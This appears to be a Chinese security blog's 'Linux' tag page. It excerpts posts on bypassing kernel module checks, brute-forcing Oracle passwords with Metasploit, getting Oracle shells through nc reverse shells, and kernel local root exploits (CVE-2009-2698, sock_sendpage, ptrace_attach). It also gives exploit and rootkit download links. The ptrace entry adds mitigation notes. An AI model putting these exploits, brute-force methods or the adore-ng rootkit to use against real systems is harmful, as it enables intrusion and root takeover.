标签 ‘Linux’ 下的日志

[WebZine]Bypassing Linux kernel module version check

By wzt

1、 为什么要突破模块验证
2、 内核是怎么实现的
3、 怎样去突破
4、 总结
5、 参考
6、 附录
阅读全文 »

Tags: ,

Linux下安装Metasploit破解Oracle登录用户名密码

作者:[email protected]

最近在搞oracle,一些小东西记录一下。

Metasploit是一个很好的攻击工具包,当然我们这次不是介绍这个工具包的,主要是大牛MC写 了很多oracle的工具,在最近会经常用。我主要会用到经典工具tnscmd移植到MSF中的小工具(不如pl的好用,没换行,看结果很 累),sid_brute和login_brute,用的最多的还是暴力破解oracle用户名和密码的login_brute。下面就说下怎么安装和使 用,主要是安装,因为有些需要注意的东西,请注意斜体字。
阅读全文 »

Tags: , ,

Linux下Oracle获取shell

作者:浅凝

很多时候对于开放1521端口的Windows下Oracle数据库服务器,因为大多存在默认低权限用户dbsnmp,或者人品爆发高权限的用户 (sysdba)是默认密码或弱口令,由此可以通过Oracle的一些提权漏洞获取Oracle的最高权限,直至得到系统的SYSTEM权限。

而 对于Linux下的Oracle数据库入侵,因为Linux下一般Oracle数据库都是以Oracle的独立用户在跑,所以无法获取到root权限。当 然很多WEB和数据库在同一服务器上的时候,可以导出WEBSHELL到WEB目录来获取权限。然而大部分的数据库都是独立跑在一个服务器上,以下用简单 的方式获取Oracle的shell,即采用nc反弹的shell的方式。
阅读全文 »

Tags: , , ,

Linux Kernel 2.6 < 2.6.19 (32bit) ip_append_data() ring0 Root Exploit

/*
**
** 0x82-CVE-2009-2698
** Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit
**
** Tested White Box 4(2.6.9-5.ELsmp),
** CentOS 4.4(2.6.9-42.ELsmp), CentOS 4.5(2.6.9-55.ELsmp),
** Fedora Core 4(2.6.11-1.1369_FC4smp), Fedora Core 5(2.6.15-1.2054_FC5),
** Fedora Core 6(2.6.18-1.2798.fc6).
阅读全文 »

Tags: , , , ,

Linux Kernel 2.x sock_sendpage() Local Root Exploit #2

> Linux NULL pointer dereference due to incorrect proto_ops initializations
> > ————————————————————————-

Quick and dirty exploit for this one:

http://www.frasunek.com/proto_ops.tgz
back: http://milw0rm.com/sploits/2009-proto_ops.tgz

# milw0rm.com [2009-08-14]

Tags: , , ,

Linux Kernel 2.x sock_sendpage() Local Ring0 Root Exploit

/* dedicated to my best friend in the whole world, Robin Price
the joke is in your hands

just too easy — some nice library functions for reuse here though

credits to julien tinnes/tavis ormandy for the bug

may want to remove the __attribute__((regparm(3))) for 2.4 kernels, I have no time to test
阅读全文 »

Tags: , , ,

Linux Kernel 2.6.x ptrace_attach Local Privilege Escalation Exploit

# 鬼仔:加点其他跟这个漏洞相关的信息。
—————————-
素包子
素包子快速的看了下漏洞利用程序,原理应该是通过 ptrace挂到一个suid root程序上,然后利用ptrace_attach函数的漏洞,以root权限执行指令,产生/tmp/.exp这个local root shell。不幸中的万幸,这个exp写的稍微有点问题,在REDHAT里需要稍作修改才能成功获得root权限。
素包子提供几个临时解决方案以供大家选择(以下方案由简至难):
1、禁用本地所有普通用户账号,直到发布补丁。此方案无法防止有webshell的黑客获得root权限。
2、禁用系统所有的suid root程序,直到发布补丁。此方案会导致系统部分功能无法正常使用。
3、安装sptrace LKM禁用普通用户使用ptrace。此方案对业务影响相对较小,但实施较为复杂。
—————————-
noop
漏洞并不是本来存在于ptrace里面的,而是因为在2.6.29中引入了cred_exec_mutex互斥对象,但是使用的时候lock错了对象造成的。所以2.6.29以下版本不要去动脑筋了,没用的。
阅读全文 »

Tags: , ,

Linux rootkit adore-ng-0.56-wztfix 发布

作者:wzt

adore-ng老牌的linux rootkit在高版本内核编译不过去了, 简单的fix了下, 可以在高版本内核编译和运行。有需求的同学可以试试。

下载地址:adore-ng-056-wztfix.rar

Tags: , ,